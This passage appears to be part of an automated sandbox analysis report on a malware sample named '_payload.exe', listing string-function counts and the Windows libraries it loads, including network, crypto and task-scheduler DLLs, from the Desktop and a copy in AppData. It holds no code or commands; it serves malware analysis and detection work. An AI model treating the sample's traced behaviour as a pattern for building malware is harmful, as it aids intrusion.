              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: String function: 00F54E50 appears 62 times
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: String function: 00F50870 appears 52 times
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: String function: 00F2F7C0 appears 128 times
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: String function: 00F547A0 appears 64 times
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: String function: 00F41A25 appears 44 times
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: String function: 00F4F26C appears 41 times
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: String function: 00F32587 appears 48 times
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: String function: 00F3F7C0 appears 129 times
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: String function: 00F5F26C appears 41 times
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: String function: 00F647A0 appears 64 times
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: String function: 00F64E50 appears 62 times
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: String function: 00F60870 appears 52 times
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: String function: 00F51A25 appears 44 times
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: String function: 00F38520 appears 136 times
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: String function: 00F5F23E appears 108 times
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: String function: 00F38C81 appears 74 times
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: String function: 00F30EC2 appears 40 times
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeSection loaded: taskschd.dllJump to behavior
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeSection loaded: xmllite.dllJump to behavior
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeSection loaded: edputil.dllJump to behavior
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeSection loaded: windows.staterepositoryps.dllJump to behavior
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeSection loaded: appresolver.dllJump to behavior
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeSection loaded: bcp47langs.dllJump to behavior
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeSection loaded: slc.dllJump to behavior
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeSection loaded: sppc.dllJump to behavior
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeSection loaded: pcacli.dllJump to behavior
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeSection loaded: sfc_os.dllJump to behavior
              Source: C:\Windows\SysWOW64\icacls.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeSection loaded: taskschd.dllJump to behavior
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeSection loaded: xmllite.dllJump to behavior
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeSection loaded: dhcpcsvc.dllJump to behavior
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeSection loaded: edputil.dllJump to behavior
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeSection loaded: windows.staterepositoryps.dllJump to behavior
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeSection loaded: appresolver.dllJump to behavior
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeSection loaded: bcp47langs.dllJump to behavior
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeSection loaded: slc.dllJump to behavior
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeSection loaded: sppc.dllJump to behavior
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeSection loaded: drprov.dllJump to behavior
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeSection loaded: winsta.dllJump to behavior
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeSection loaded: ntlanman.dllJump to behavior
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeSection loaded: davclnt.dllJump to behavior
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeSection loaded: davhlpr.dllJump to behavior
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeSection loaded: wkscli.dllJump to behavior
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeSection loaded: cscapi.dllJump to behavior
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeSection loaded: browcli.dllJump to behavior
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeSection loaded: netapi32.dllJump to behavior
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeSection loaded: dhcpcsvc.dllJump to behavior
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeSection loaded: drprov.dllJump to behavior
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeSection loaded: winsta.dllJump to behavior
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeSection loaded: ntlanman.dllJump to behavior
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeSection loaded: davclnt.dllJump to behavior
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeSection loaded: davhlpr.dllJump to behavior
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeSection loaded: wkscli.dllJump to behavior
